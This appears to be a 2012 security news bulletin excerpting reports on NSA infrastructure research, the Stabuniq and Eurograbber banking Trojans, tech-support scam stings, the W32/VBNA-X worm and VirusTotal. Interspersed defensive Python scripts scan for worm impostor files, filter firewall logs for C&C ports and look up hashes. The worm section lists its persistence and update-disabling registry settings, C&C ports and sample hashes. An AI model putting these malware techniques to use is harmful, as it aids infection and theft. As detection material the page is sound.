
Softpanorama Malware Protection Bulletin, 2012




Old News ;-)

[Dec 26, 2012] NSA targeting domestic computer systems in secret test

NSA recognized the danger of "blowback" from Stuxnet. Pandora's box is open. And now the USA, as the country with a huge number of advanced control systems, must pay the price for the luxury of disrupting the Iranian uranium enrichment program...

Newly released files show a secret National Security Agency program is targeting the computerized systems that control utilities to discover security vulnerabilities, which can be used to defend the United States or disrupt the infrastructure of other nations.

The NSA's so-called Perfect Citizen program conducts "vulnerability exploration and research" against the computerized controllers that control "large-scale" utilities including power grids and natural gas pipelines, the documents show. The program is scheduled to continue through at least September 2014.

The Perfect Citizen files obtained by the Electronic Privacy Information Center and provided to CNET shed more light on how the agency aims to defend -- and attack -- embedded controllers. The NSA is reported to have developed Stuxnet, which President Obama secretly ordered to be used against Iran's nuclear program, with the help of Israel.

...One NSA employment posting for a Control System Network Vulnerability Analyst says the job involves "building proof-of-concept exploits," and an Air Force announcement in August called for papers discussing "Cyberspace Warfare Attack" capabilities. The Washington Post reported last month that Obama secretly signed a directive in October outlining the rules for offensive "cyber-operations."

"Sabotage or disruption of these industries can have wide-ranging negative effects including loss of life, economic damage, property destruction, or environmental pollution," the NSA concluded in a public report (PDF) discussing industrial control systems and their vulnerabilities.

The 190 pages of the NSA's Perfect Citizen files, which EPIC obtained through the Freedom of Information Act last week, are heavily redacted. At least 98 pages were completely deleted for a number of reasons, including that portions are "classified top secret," and could "cause exceptionally grave damage to the national security" if released, according to an accompanying letter from Pamela Phillips, chief of the NSA's FOIA office.

But the portions that were released show that Raytheon received a contract worth up to $91 million to establish Perfect Citizen, which "enables the government to protect the systems," especially "large-scale distributed utilities," operated by the private sector.

The focus is "sensitive control systems," or SCS, which "provide automation of infrastructure processes." Raytheon is allowed to hire up to 28 hardware and software engineers who are supposed to "investigate and document the results of vulnerability exploration and research against specific SCS and devices."

...One job description, for a senior penetration tester, says the position will "identify and demonstrate vulnerabilities," and requires experience using security-related utilities such as Nmap, Tenable's Nessus, Libnet, and Netcat. Raytheon is required not to disclose that this work is being done for the NSA.

The Wall Street Journal disclosed the existence of Perfect Citizen in a 2010 article, which reported the NSA's "surveillance" of such systems relies "on a set of sensors deployed in computer networks for critical infrastructure that would be triggered by unusual activity suggesting an impending cyber attack."

An NSA spokeswoman responded to CNET at the time by saying that Perfect Citizen is "purely a vulnerabilities assessment and capabilities development contract" that "does not involve the monitoring of communications or the placement of sensors on utility company systems."

Marc Rotenberg, EPIC's executive director, said that the newly declassified documents "may help disprove" the NSA's argument that Perfect Citizen doesn't involve monitoring private networks.

The FOIA'd documents say that because the U.S. government relies on commercial utilities for electricity, telecommunications, and other infrastructure requirements, "understanding the technologies utilized in the infrastructure nodes to interoperate on the commercial backbone enables the government to protect the systems."

[Dec 26, 2012] How Do YOU Establish a Secure Computing Environment

Amazingly low level of discussion. Complete degeneration of Slashdot....


I've got a VM that I run on Windows 2000. That OS is no longer patched by Microsoft so I don't want to expose it to the internet. I turned off all the networking protocols and shut off all the services that have to do with I/O. If I open a browser the only site it will connect to is a server I have running inside the VM, which requires a password. I turned off the network shares so there's no chance of getting an infected file from the host machine. The only way to write a file to it is via a USB drive and I scan those before I connect it.

The OS runs great and, with all those unnecessary services turned off, quickly as well.


This is about my personal computing, but I would apply the same general principles to other non-critical environments.

What's the worst thing that could happen to my computers? Someone sneaks into my home and installs a hidden camera to catch everything that's on the screen and all keyboard input, AND they somehow install something to log all network traffic and become the man in the middle when they want to.

How likely is this? Unless the feds confuse me with a terrorist and do this with a warrant, it's exceedingly unlikely.

What are some other "high-loss" risks?

So here's the big question:

What are the security vulnerabilities I can mitigate cheaper than the "cost" of just not having a network-attached computer at all?

Bottom line:


The term "secure" here is used in a somewhat misleading manner; there's nothing that could possibly be absolutely "secure" in this world, ever.

We should always ask only what amount of security the environment provides. In terms of money.

[Dec 21, 2012] Trojan.Stabuniq Found on Financial Institution Servers


Almost a year ago we added detection for a low prevalence Trojan found on servers belonging to financial institutions, including banking firms and credit unions. The Trojan also compromised home computer users and computers at security firms. For easier identification and tracking we recently renamed this threat to Trojan.Stabuniq.

Approximately half of unique IP addresses found with Trojan.Stabuniq belong to home users. Another 11 percent belong to companies that deal with Internet security (due, perhaps, to these companies performing analysis of the threat). A staggering 39 percent, however, belong to financial institutions. These financial institutions had their outer perimeter breached as the Trojan has been found on mail servers, firewalls, proxy servers, and gateways.

Trojan.Stabuniq has relied upon a combination of spam email and Web exploit kits to compromise computers. Over the past year, this threat has only been found in small numbers and has not been widespread, suggesting the authors may have been targeting specific people and entities. The approximate location of unique IP addresses where the Trojan has been found converges on the eastern half of the United States:

The Trojan collects information from the compromised computer and then sends it to a command-and-control (C&C) server. Additional technical details are available.

Overall, this Trojan has not infected many machines in the past year, is localized to the United States, and, given that close to 40 percent of its targets are financial institutions, at this stage we believe the malware authors may simply be gathering information.

[Dec 16, 2012] Sophisticated botnet steals more than $47M by infecting PCs and phones

This is way too complex... But this scheme does defeat two-factor authentication. Still, the most vulnerable point here for the attackers is how to set up the account to which they transfer the money, and how to cash out from it.
Dec 5 2012 | ArsTechnica
A new version of the Zeus trojan, a longtime favorite of criminals conducting online financial fraud, has been used in attacks on over 30,000 electronic banking customers in Europe, infecting both their personal computers and smartphones. The sophisticated attack is designed to circumvent banks' use of two-factor authentication for transactions by intercepting messages sent by the bank to victims' mobile phones.

The malware and botnet system, dubbed "Eurograbber" by security researchers from Check Point Software and Versafe, was first detected in Italy earlier this year. It has since spread throughout Europe. Eurograbber is responsible for more than $47 million in fraudulent transfers from victims' bank accounts, stealing amounts from individual victims that range from 500 Euros (about $650) to 25,000 Euros (about $32,000), according to a report published Wednesday (PDF).

The malware attack begins when a victim clicks on a malicious link, possibly sent as part of a phishing attack.

Clicking on the link directs them to a site that attempts to download one or more trojans: customized versions of Zeus and its SpyEye and CarBerp variants that allow attackers to record Web visits and then inject HTML and JavaScript into the victim's browser. The next time the victim visits their bank website, the trojans capture their credentials and launch a JavaScript that spoofs a request for a "security upgrade" from the site, offering to protect their mobile device from attack.

The JavaScript captures their phone number and their mobile operating system information -- which are used in the second level of Eurograbber's attack.

With the phone number and platform information, the attacker sends a text message to the victim's phone with a link to a site that downloads what it says is "encryption software" for the device. But it is, in fact, "Zeus in the mobile" (ZITMO) malware -- a Trojan crafted for the Android and BlackBerry mobile operating systems that injects itself between the user and the mobile browser and SMS messaging software.

With both devices now compromised, the malware waits for the victim to access a bank account, and then immediately transfers a percentage of the victim's balance to an account set up by the criminals running the botnet.

The malware then intercepts the confirmation text message sent by the bank, forwarding it to the trojan's command and control server via a relay phone number. The server uses the message to confirm the transaction and withdraw the money. The same process happens every time the victim logs into their bank account, gradually withdrawing money without alerting the user.
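The cash-out step described above gives a bank's fraud logic something to key on. The following Python heuristic is an added example and not code from the Ars article or the Check Point/Versafe report: two of the traits it scores (a transfer submitted immediately after login, sized as a percentage of the balance) are stated in the text, the third (a beneficiary the customer has never paid before) is an assumption, and the thresholds and customer records are constructed. The practical caveat it encodes is that whatever a hold triggers, it cannot be another SMS, because that is the channel the mobile Trojan already reads.

```python
"""Added example, not code from the Ars article or the Check Point/Versafe
report: a bank-side heuristic for the Eurograbber cash-out step.

Two traits come from the text: the transfer is fired as soon as the victim
reaches the account, and it takes a percentage of the balance. The third,
that the destination is a mule account this customer has never paid, is an
assumption, and every threshold here is illustrative."""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Transfer:
    customer: str
    login_at: datetime
    submitted_at: datetime
    amount: float
    balance_before: float
    beneficiary: str


def risk_flags(t, known_beneficiaries, max_latency=timedelta(seconds=60),
               min_share=0.10):
    """Return the list of Eurograbber-like traits this transfer shows."""
    flags = []
    if t.submitted_at - t.login_at <= max_latency:
        flags.append("submitted within %d s of login" % max_latency.total_seconds())
    if t.beneficiary not in known_beneficiaries.get(t.customer, set()):
        flags.append("first payment to this beneficiary")
    if t.balance_before > 0 and t.amount / t.balance_before >= min_share:
        flags.append("%.0f%% of balance" % (100 * t.amount / t.balance_before))
    return flags


def should_hold(t, known_beneficiaries):
    """Hold the transfer for review when all three traits coincide.

    What a hold must NOT do is re-confirm over SMS: in the attack described
    above the confirmation text is read and relayed by the Trojan on the
    phone, so SMS is the one channel the attacker already controls."""
    return len(risk_flags(t, known_beneficiaries)) == 3


# Constructed records, not real customer data.
KNOWN = {"cust-1": {"ACME Utilities", "Landlord GmbH"}}
T0 = datetime(2012, 12, 5, 9, 0, 0)
EXAMPLES = [
    # fired 4 s after login, to a never-seen payee, 15% of the balance
    Transfer("cust-1", T0, T0 + timedelta(seconds=4), 1200.0, 8000.0, "new-payee-7731"),
    # a routine bill paid four minutes into the session
    Transfer("cust-1", T0, T0 + timedelta(minutes=4), 90.0, 8000.0, "ACME Utilities"),
]

if __name__ == "__main__":
    for t in EXAMPLES:
        verdict = "HOLD" if should_hold(t, KNOWN) else "ok"
        print(t.beneficiary, verdict, risk_flags(t, KNOWN))
```

Any one flag on its own is common in honest traffic (people do pay new payees, and do so quickly); it is the coincidence of all three, on the schedule the malware follows at every login, that makes the pattern worth acting on.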

[Dec 16, 2012] How Windows tech support scammers walked right into a trap set by the feds by Jon Brodkin

Dec 5 2012 | ArsTechnica

Three weeks ago, Jack Friedman got a call from a man with an Indian accent claiming to be from the Windows technical team at Microsoft. Friedman, a Florida resident who is my friend Elliot's grandfather, was told by "Nathan James" from Windows that he needed to renew his software protection license to keep his computer running smoothly. "He said I had a problem with my Microsoft system," Friedman told me. "He said they had a deal for $99, they would straighten out my computer and it will be like brand new."

Friedman's three-year-old Windows Vista computer was running a bit slow, as many PCs do. Friedman is often suspicious of unsolicited calls, but after talking with Nathan on the phone and exchanging e-mails, he says, "I figured he was a legitimate guy." Friedman handed over his Capital One credit card number, and the "technician" used remote PC support software to root around his computer for a while, supposedly fixing whatever was wrong with it.

"I could see my arrow going all over the place and clicking different things on my computer," Friedman said. But that $99 Capital One credit card charge turned into a $495 wire transfer. Then Bank of America's fraud department called Friedman, and said, "somebody is trying to get into your account." Whoever it was had entered the wrong password multiple times, and as a precaution Friedman's checking account was shut down.

Capital One restored his lost $495, but the hassles didn't end there. Because of the action Bank of America took, Friedman's checks started bouncing. He's had to change passwords on all his accounts, get new credit cards, and pay a real computer technician $75 to clean out all the junk installed by the scammer.

Friedman is one of thousands of people hoodwinked by this Windows tech support scam, which authorities say has bilked unwitting PC owners out of tens of millions of dollars. Friedman's story shows that the scam is alive and well even though the Federal Trade Commission shut down a bunch of the companies allegedly doing the scamming, as we reported in early October. The FTC filed six lawsuits against more than 30 defendants, a number of whom are in settlement talks with the FTC to end litigation.

Those lawsuits show that the Windows tech support scammers are often just as likely to fall for a good con as anyone else.

To catch a thief: One phone call is all it takes

The Windows tech support scammers all follow the same general script. There are nuances and differences, but the process of convincing people who answer the phone that their PCs are riddled with viruses never changes too much.

You might think that if you spent your whole day calling people on the phone to scam them, if your paycheck depended upon fooling the gullible, that you'd be pretty good at detecting a scam yourself. But ultimately, the people doing the scamming aren't likely to be the masterminds. They're just the work-a-day drones doing their employer's bidding, perfect targets for the undercover investigators at the FTC.

When the FTC announced its crackdown on the tech support scammers, the agency played a recorded undercover call but otherwise didn't spend much time talking about how they tracked the defendants down in the first place. Court documents the FTC subsequently sent our way show that it was rather easy. Or, more precisely, once the difficult groundwork of tracking down the scammers had been laid, the scammers walked right into the FTC's trap, as gullible and helpless as the victims whose bank accounts they raided.

Declarations and transcripts FTC agents filed in US District Court in Southern New York show just how the operations went down. These documents were filed along with the initial complaints, but for whatever reason they did not make it onto the Public Access to Court Electronics Records (PACER) system.

"Did you just call me?"

In a typical Windows tech support scam, the scammer calls up a random person, informing them that their computer has been hijacked by viruses and that the scammer knows this because as a member of the Windows technical support team they can track any computer connected to the Internet. Next, the scammer directs the victim to look at the Windows Event Viewer, a standard part of the Windows operating system that displays mostly harmless error logs. From there, the scammer convinces the victim that these error logs are signs of serious infections and that they need to pay some cash to make the infections go away.


We previously regaled you with the tales of angry and creative citizens of the Internet who turned the tables on the scammers by performing elaborate trolls, and also of Ars editor Nate Anderson's experience playing along with a scam call in order to document what happened.

But that requires waiting for one of the calls to come. What if it doesn't? The FTC's strategy of gathering evidence involved having trained agents go undercover as helpless consumers. No surprise there. But instead of waiting for a call, the FTC's investigators called up the scammers themselves, using undercover identities not associated to the FTC.

"On or about February 14, 2012, when I dialed (888) 408-6651, a representative answered, 'Thank you for calling tech support. My name is Victor. How may I help you?' I said that I had received a call, the caller had said something about my computer and Microsoft, and that I wanted to know what this was about."

So begins one of the meaty parts of a declaration by FTC investigator Sheryl Novick, who conducted the stings along with FTC paralegal specialist Jennifer Rodden. Novick hadn't received any call; she just called one of the numbers that appeared in numerous consumer complaints. Novick's statement comes from a case against Zeal IT Solutions, but most of the stings went down the same way. Novick's declaration continues:

Victor said they were a tech support company, providing service mainly to Windows users. He told me the name of the company was "Support One Care" and later said they were located in the Eastern part of India. After taking my information, Victor explained that I got a call because they were doing a check-up call for the computer. He asked if my computer was facing any problems but I told him I wasn't sure. He said he was with the technical department and that he'd have to connect me with the registration department and they would call me back. He said I could view their website at '' to see the details of the services they provide.

We hung up because he said he would call me from his number to show me the computer's infections. But he called me back shortly after to tell me someone else would be calling me soon. I received a call back that same day from someone who identified himself as Robin Wilson from the computer technical department of Support One Care. He said they were calling me "because from the past two months, whenever the Windows user have been going online, at that point of time, some malicious infections are automatically getting downloaded... 90 percent of the Windows user have these malicious infections in their hard drive."

He said they were calling to make me aware of the infections.

And the trap was sprung. Although the scammers typically tried to hide their identities and locations by using voice over Internet protocols, they didn't do much else to protect themselves. Windows tech support cold callers have told some victims they have a massive database notifying them each time a computer connected to the Internet is infected. In reality, they're not so omniscient. They couldn't even verify (or just didn't bother to verify) whether they had previously called the number used by the undercover FTC agent. The scammers took the FTC agent's statements at face value and played along more than enough to get shut down and hauled into court.

[Nov 30, 2012] W32/VBNA-X worm spreads quickly through networks and removable media by Chester Wisniewski

Disable Autorun/Autoplay completely using Microsoft's instructions, which include a "FixIt".
November 30, 2012 | Naked Security


SophosLabs researchers have noticed a significant increase in the spread of malware we call W32/VBNA-X (among other names).

Several other vendors, including McAfee (W32/Autorun.worm.aaeb) and Symantec (W32.ChangeUp), have been alerting their customers as well. While the basic components of this malware have been around for some time, it has become considerably more aggressive in its latest iteration.


W32/VBNA-X is a worm, but also exhibits characteristics typically found in a Trojan. Its most obvious method of spreading appears to be through the use of autorun.inf files dropped on removable media and writable network shares.

You would hope this technique wouldn't be too effective on today's PCs, though. Microsoft released updates for XP, 2003 and Vista in February 2011 to disable Autorun on all media aside from "shiny discs."

It is still not a bad idea to disable Autorun/Autoplay more completely, which is quite easy to do according to Microsoft's instructions, which include a "FixIt."

Most PCs will ignore autorun.inf files these days, so people must be clicking on the malware itself, but why?

It appears to be a cocktail of clever social engineering, poor default settings and user carelessness.

After creating the autorun.inf file for the unpatched victims, it begins to enumerate all of the file and folder names on writable shares and removable devices.

For example, say your E: drive is a network share with folders named au and r and files named as.txt and Adobe.pdf.

It will set all of these to have the hidden attribute and set a registry key to ensure hidden files are not displayed.

Then it will create copies of itself called Porn.exe, Sexy.exe, Passwords.exe and Secret.exe in addition to creating a copy of itself for each legitimate file and folder present on the volume.

The duplicates of the original folders and files will have their icons set to the standard folder icon in Windows 7.

Screenshot of infected file share


In this screenshot you can see the original folders at the top showing their Windows XP icons and the cloned/Trojaned ones with the Windows 7 icons lower down.

The malware appears to assume that you are not showing extensions, which is the default in all releases of Windows.

Screenshot of infected file share with extensions and hidden files shown

I can easily see how people browsing file shares and USB drives could accidentally click the wrong folder, especially if the real folders are set to hidden.

If we show extensions and view all hidden files we see a very different picture.

In addition to the original files and their impostors there are also files called ..exe and ...exe. The malware is also known to write a zero byte file called x.mpeg, although it did not do so in this test instance.

The malware copies itself to the user's profile using a random file name and adds a registry key to start the malware on boot.

Some variants are known to disable Windows Update to prevent the victim from receiving a patch or updated instructions that may disable it.

W32/VBNA-X is also polymorphic so the SHA1 checksums vary for some of the files:

30582368427f752b7b6da4485db456de915101b2 SHA1 for Porn.exe
7ff75f92c5461cc221cb3ab914592bd2a5db6e15 SHA1 for Sexy.exe
d71a89c085ffbb62f4e222fb2f42d7e2271e4642 SHA1 of all the rest

Registry keys created:

    %UserProfile%\%random% /%randomletter% - For persistence

    NoAutoUpdate = 1 - To disable updates

    ShowSuperHidden = 0 - To ensure hidden items stay hidden
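The naming trick above (hidden original, visible same-named .exe with a folder icon, plus the Porn.exe/Sexy.exe lures and the ..exe, ...exe and x.mpeg artifacts) is mechanical enough to look for on a share or USB stick. The following Python script is an added example, not code from the Sophos post. It reads the Windows hidden attribute where the interpreter exposes it and falls back to a leading dot elsewhere (an assumption for shares mounted on a non-Windows host), and compares any flagged file against the three SHA1s quoted above, which, since the worm is polymorphic, confirm a hit but never clear a file.

```python
"""Added example (not from the Sophos post): flag the W32/VBNA-X impostor
pattern in a file share or removable drive.

Pattern from the post: originals get the hidden attribute and a same-named
.exe appears beside each one (au -> au.exe, as.txt -> as.txt.exe), alongside
lures (Porn.exe, Sexy.exe, ...) and artifacts (..exe, ...exe, x.mpeg)."""
import hashlib
import os
import stat
from dataclasses import dataclass

# SHA1s quoted in the post for one sample set. The worm is polymorphic, so a
# match confirms an infection but a miss clears nothing.
KNOWN_SHA1 = {
    "30582368427f752b7b6da4485db456de915101b2": "Porn.exe sample",
    "7ff75f92c5461cc221cb3ab914592bd2a5db6e15": "Sexy.exe sample",
    "d71a89c085ffbb62f4e222fb2f42d7e2271e4642": "cloned file/folder copies",
}
LURE_NAMES = {"porn.exe", "sexy.exe", "passwords.exe", "secret.exe"}
ARTIFACT_NAMES = {"..exe", "...exe", "x.mpeg", "autorun.inf"}


@dataclass(frozen=True)
class Entry:
    name: str
    hidden: bool
    is_dir: bool


def is_hidden(path):
    """Windows hidden attribute when the interpreter exposes it; elsewhere a
    leading dot (assumption for shares mounted on a non-Windows host)."""
    st = os.lstat(path)
    attrs = getattr(st, "st_file_attributes", 0)
    if attrs & getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0):
        return True
    return os.path.basename(path).startswith(".")


def list_entries(directory):
    """Snapshot one directory as Entry records."""
    out = []
    for name in os.listdir(directory):
        full = os.path.join(directory, name)
        out.append(Entry(name, is_hidden(full), os.path.isdir(full)))
    return out


def find_impostors(entries):
    """Map suspect file name -> reason for a single directory listing."""
    by_lower = {e.name.lower(): e for e in entries}
    hits = {}
    for e in entries:
        if e.is_dir:
            continue
        low = e.name.lower()
        if low in LURE_NAMES:
            hits[e.name] = "lure filename"
        elif low in ARTIFACT_NAMES:
            hits[e.name] = "worm artifact"
        elif low.endswith(".exe") and low[:-4] in by_lower:
            # au.exe next to au, as.txt.exe next to as.txt: the worm's clone
            twin = by_lower[low[:-4]]
            kind = "folder" if twin.is_dir else "file"
            state = "hidden " if twin.hidden else ""
            hits[e.name] = f"shadows {state}{kind} {twin.name!r}"
    return hits


def sha1_of(path):
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_directory(root):
    """Walk a share or drive; return [(path, reason, known-sample label or None)]."""
    findings = []
    for directory, _subdirs, _files in os.walk(root):
        for name, reason in find_impostors(list_entries(directory)).items():
            path = os.path.join(directory, name)
            label = KNOWN_SHA1.get(sha1_of(path)) if os.path.isfile(path) else None
            findings.append((path, reason, label))
    return findings


if __name__ == "__main__":
    import sys
    for path, reason, label in scan_directory(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: {reason}" + (f" [matches {label}]" if label else ""))
```

A visible foo.exe whose twin foo is not hidden may be a legitimate installer sitting beside its extracted folder, so treat only the hidden-twin, lure and artifact cases as high confidence; the registry values listed above live on the infected host, not on the share, and are checked there separately.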

You're infected, now what happens?

These samples follow the standard operating procedure for modern malware. Once loaded W32/VBNA-X contacts a command and control (C&C) server to receive instructions for further payloads to download.

The malware attempts to contact the C&Cs on port 9003 using HTTP, although McAfee has reported seeing samples connecting to port 9004 as well.

Many of the DNS names are hosted in the domain space, but the entire list is quite extensive. Administrators who wish to monitor for infections may wish to monitor their firewall logs for connections to ports 900[0-9].

Once the C&C server is contacted a command and URL is passed back to the malware instructing it to download a payload named google.exe which is placed in the users profile directory.

The instances we investigated downloaded banking Trojans belonging to the Zeus/Zbot family, but the payload served can change frequently based on time of day or geographic location.
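Following the advice above to watch for connections to ports 900[0-9], here is an added Python example (not from the Sophos post) that picks beaconing pairs out of netfilter-style firewall log lines. The log field layout, the use of the RFC1918 ranges as "internal", and the sample lines are all constructed assumptions. The point is to discount internal-to-internal traffic on those ports, which is where the false positives live, and to count repeated outbound hits per source/destination pair rather than alerting on every line.

```python
"""Added example (not from the Sophos post): pull candidate W32/VBNA-X beacons
out of firewall logs, following the advice to watch ports 900[0-9].

Assumptions: netfilter-style "SRC= DST= PROTO= DPT=" fields, RFC1918 as the
internal address space, and constructed sample lines (not real traffic)."""
import ipaddress
import re

FIELD_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+).*?PROTO=(?P<proto>\S+).*?DPT=(?P<dpt>\d+)"
)
SUSPECT_PORTS = range(9000, 9010)  # the post: C&C on 9003, McAfee also saw 9004
INTERNAL = [ipaddress.ip_network(n)
            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample lines, not real traffic.
SAMPLE_LOG = """\
Nov 30 10:01:02 fw kernel: FWD IN=eth1 OUT=eth0 SRC=10.0.0.15 DST=198.51.100.7 PROTO=TCP SPT=49211 DPT=9003
Nov 30 10:01:03 fw kernel: FWD IN=eth1 OUT=eth0 SRC=10.0.0.15 DST=198.51.100.7 PROTO=TCP SPT=49212 DPT=9003
Nov 30 10:02:11 fw kernel: FWD IN=eth1 OUT=eth1 SRC=10.0.0.22 DST=10.0.0.5 PROTO=TCP SPT=51000 DPT=9001
Nov 30 10:02:40 fw kernel: FWD IN=eth1 OUT=eth0 SRC=10.0.0.15 DST=198.51.100.7 PROTO=TCP SPT=49213 DPT=9004
Nov 30 10:03:00 fw kernel: FWD IN=eth1 OUT=eth0 SRC=10.0.0.31 DST=203.0.113.9 PROTO=TCP SPT=40000 DPT=443
Nov 30 10:03:05 fw kernel: FWD IN=eth1 OUT=eth0 SRC=10.0.0.40 DST=203.0.113.9 PROTO=UDP SPT=40001 DPT=9005
"""


def parse(line):
    """(src, dst, proto, dport) or None for lines without the four fields."""
    m = FIELD_RE.search(line)
    if not m:
        return None
    return m.group("src"), m.group("dst"), m.group("proto"), int(m.group("dpt"))


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)


def suspect_beacons(lines, min_hits=2):
    """Group outbound TCP hits on 900[0-9] by (src, dst); keep pairs seen at
    least min_hits times.

    Internal-to-internal traffic on these ports is the usual false positive
    (management agents and app servers live there too), so it is dropped,
    and a single hit is not worth a ticket: the worm checks in with its C&C
    for instructions, so a real infection shows the same pair repeatedly."""
    pairs = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        src, dst, proto, dport = rec
        if proto != "TCP" or dport not in SUSPECT_PORTS or is_internal(dst):
            continue
        entry = pairs.setdefault((src, dst), {"hits": 0, "ports": set()})
        entry["hits"] += 1
        entry["ports"].add(dport)
    return {pair: v for pair, v in pairs.items() if v["hits"] >= min_hits}


if __name__ == "__main__":
    for (src, dst), v in suspect_beacons(SAMPLE_LOG.splitlines()).items():
        print(f"{src} -> {dst} ports={sorted(v['ports'])} hits={v['hits']}")
```

Run against the sample, only 10.0.0.15 talking to 198.51.100.7 on 9003 and 9004 survives; the 9001 hit to an internal host, the UDP line and the 443 connection are all dropped. On a real perimeter the port filter is only a first cut, and the flagged host should then be checked for the file-share and registry artifacts described earlier.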


Aside from keeping your anti-virus up to date there are several things you can do and can watch for.

Sophos Anti-Virus on all platforms detects and blocks the various components of this malware as follows:

* W32/VBNA-X: Specific detection for this worm (variants include W32/VBNA-U, W32/VBNA-Z, W32/VBNA-AA and W32/VBNA-AB)
* Mal/SillyFDC-Z Generic worm detections for Autorun.inf files (variants include Mal/Autorun-AX, W32/SillyFDC-IP and W32/AutoInf-DI)
* Troj/Tepfer-E Trojan payloads detected in relation to this malware (variants include Troj/VB-GFM, W32/SillyFDC-IP and Mal/SillyFDC-Z)
* HIPS/RegMod-009 Proactive detection and prevention for registry modifications and persistence

* Customers using Sophos web protection will be prevented from accessing domains known to be involved with this malware

I would like to extend a special thank you to the entire SophosLabs Vancouver team and especially Mike Wood, Peter Szabo and Savio Lau for spending so much extra time to share these details with our readers.

About VirusTotal


What is VirusTotal

VirusTotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners. At the same time, it may be used as a means to detect false positives, i.e. innocuous resources detected as malicious by one or more scanners.

VirusTotal's mission is to help in improving the antivirus and security industry and make the internet a safer place through the development of free tools and services.

VirusTotal's main characteristics are highlighted below.

Free unbiased service

VirusTotal is offered freely to end users as long as its use has no commercial purpose and does not become part of any business activity. Even though the service works with engines belonging to different enterprises and organizations, VirusTotal does not distribute or advertise any products belonging to third parties, but simply acts as an aggregator of information. This prevents us from being subjected to any kind of bias and allows us to offer an objective service to our users.

Runs multiple antivirus engines and website scanners

VirusTotal simply acts as an information aggregator. The aggregated data is the output of different antivirus engines, website scanners, file and URL analysis tools and user contributions. The full list of antivirus solutions and website scanners used in VirusTotal can be found in the credits and collaboration acknowledgements section.

Runs multiple file and URL characterization tools

As previously stated, VirusTotal also aggregates the output of a number of file and URL characterization tools. These tools cover a wide range of purposes, ranging from providing structural information about Microsoft Windows portable executables (PEs) to identifying signed software. The full list of file and URL characterization tools used in VirusTotal can be found in the credits and collaboration acknowledgements section.

Real time updates of virus signatures and blacklists

The malware signatures of antivirus solutions present in VirusTotal are periodically updated as they are developed and distributed by the antivirus companies. The update polling frequency is 15 minutes; this makes sure that the products are using the latest signature sets.

Website scanning is done via API queries to the different companies providing the particular solution, hence, the most updated version of their dataset is always used.

Detailed results from each scanner

VirusTotal not only tells you whether a given antivirus solution detected a submitted file, but also displays the exact detection label returned by each engine (e.g. I-Worm.Allaple.gen).

This feature is also present in URL scanners. Most of them will discriminate malware sites, phishing sites, suspicious sites, etc. Moreover, some of the engines will provide additional information explicitly stating whether a given URL belongs to a particular botnet, which brand is targeted by a given phishing site, etc.

Real time global service operation statistics

Information about the number of resources (files and URLs) processed by VirusTotal can be found in the statistics section. These statistics provide a number of notions and groupings, such as global detection ratios for the received files, submissions per country, most popular detection labels, etc. No statistics comparing the different antivirus products and website detection engines are generated, nor will they ever be generated (on a public or private basis), even though their calculation is trivial. The reason is that using VirusTotal for antivirus testing is a bad idea.

Automation API

File and URL scanning can be automated with a free public API. For obvious reasons (including prevention of competition with the antivirus products present in VirusTotal), the public API is subjected to a strong request rate limitation. Should a user require a higher request rate, a honeypot API is available for researchers and a private mass API is offered to individuals with commercial and product enhancement intentions. A detailed specification of the different APIs can be found in the advanced features section.
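For the hash-first workflow the confidentiality section below implies (look up the digest first, and upload a file only once you have decided that sharing it with every vendor is acceptable), here is an added Python example that is not VirusTotal's own code. It assumes API v3, i.e. a GET on https://www.virustotal.com/api/v3/files/<hash> with the key in an x-apikey header and read from the VT_API_KEY environment variable, and a 404 for a hash VirusTotal has never seen; SAMPLE_REPORT is a constructed response in the v3 shape so the summarizer can run offline, and the digest used is the "all the rest" SHA1 quoted in the W32/VBNA-X item above. The public API quota is a few requests per minute, so batch lookups need spacing.

```python
"""Added example (not VirusTotal's code): hash lookup through the v3 files
endpoint, so the decision to upload (and thus share) a file comes after a
free check of whether it is already known.

Assumptions: API v3, key in the x-apikey header, key read from VT_API_KEY,
HTTP 404 meaning the hash has never been seen."""
import json
import os
import urllib.error
import urllib.request

VT_FILE_URL = "https://www.virustotal.com/api/v3/files/{}"  # assumption: v3 endpoint


def summarize(report):
    """Reduce a v3 file report to (malicious_count, engines_total, {engine: label}).

    last_analysis_stats counts every engine outcome (malicious, undetected,
    type-unsupported, ...), so summing it gives the number of engines that ran."""
    attrs = report["data"]["attributes"]
    stats = attrs.get("last_analysis_stats", {})
    results = attrs.get("last_analysis_results", {})
    labels = {
        engine: r["result"]
        for engine, r in results.items()
        if r.get("category") == "malicious" and r.get("result")
    }
    return stats.get("malicious", 0), sum(stats.values()), labels


def lookup(digest, api_key):
    """GET the report for an MD5/SHA1/SHA256; None when VirusTotal has never seen it."""
    req = urllib.request.Request(VT_FILE_URL.format(digest), headers={"x-apikey": api_key})
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return None
        raise


# Constructed response in the v3 shape. The vendor names and labels are the
# ones the W32/VBNA-X item pairs together; this is not real VirusTotal output.
SAMPLE_REPORT = {
    "data": {
        "attributes": {
            "last_analysis_stats": {"malicious": 3, "undetected": 2, "type-unsupported": 0},
            "last_analysis_results": {
                "Sophos": {"category": "malicious", "result": "W32/VBNA-X"},
                "McAfee": {"category": "malicious", "result": "W32/Autorun.worm.aaeb"},
                "Symantec": {"category": "malicious", "result": "W32.ChangeUp"},
                "EngineD": {"category": "undetected", "result": None},
                "EngineE": {"category": "undetected", "result": None},
            },
        }
    }
}


def describe(digest, report):
    """One line for a triage note. The 'unknown' branch is the decision point:
    uploading an unknown file shares it with every vendor behind the service."""
    if report is None:
        return f"{digest}: unknown to VirusTotal; uploading would disclose the file to all vendors"
    malicious, total, labels = summarize(report)
    detail = ", ".join(f"{engine}: {label}" for engine, label in sorted(labels.items()))
    return f"{digest}: {malicious}/{total} engines flag it ({detail})"


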